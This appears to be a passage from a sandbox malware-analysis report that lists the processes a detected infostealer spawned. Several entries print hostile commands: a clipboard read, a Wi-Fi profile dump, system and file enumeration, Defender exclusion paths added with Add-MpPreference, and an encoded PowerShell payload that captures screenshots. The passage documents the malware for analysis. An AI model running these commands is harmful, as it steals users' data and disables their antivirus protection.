                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:51
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:52
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:53
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:54
                                                                                                                                                          Start time:17:47:32
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:powershell Get-Clipboard
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:55
                                                                                                                                                          Start time:17:47:32
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\svchost.exe"
                                                                                                                                                          Imagebase:0x7ff6fb680000
                                                                                                                                                          File size:12'576'970 bytes
                                                                                                                                                          MD5 hash:48B277A9AC4E729F9262DD9F7055C422
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 42%, ReversingLabs
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:56
                                                                                                                                                          Start time:17:47:33
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\setup.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\setup.exe"
                                                                                                                                                          Imagebase:0x7ff758680000
                                                                                                                                                          File size:5'617'152 bytes
                                                                                                                                                          MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:57
                                                                                                                                                          Start time:17:47:33
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:58
                                                                                                                                                          Start time:17:47:33
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:59
                                                                                                                                                          Start time:17:47:34
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:60
                                                                                                                                                          Start time:17:47:34
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:61
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:62
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:63
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:64
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:65
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:66
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:67
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:68
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:69
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                          Imagebase:0x7ff697450000
                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:70
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                          Imagebase:0x7ff6f3710000
                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:71
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:72
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:73
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:74
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:75
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:76
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:77
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:78
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:79
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
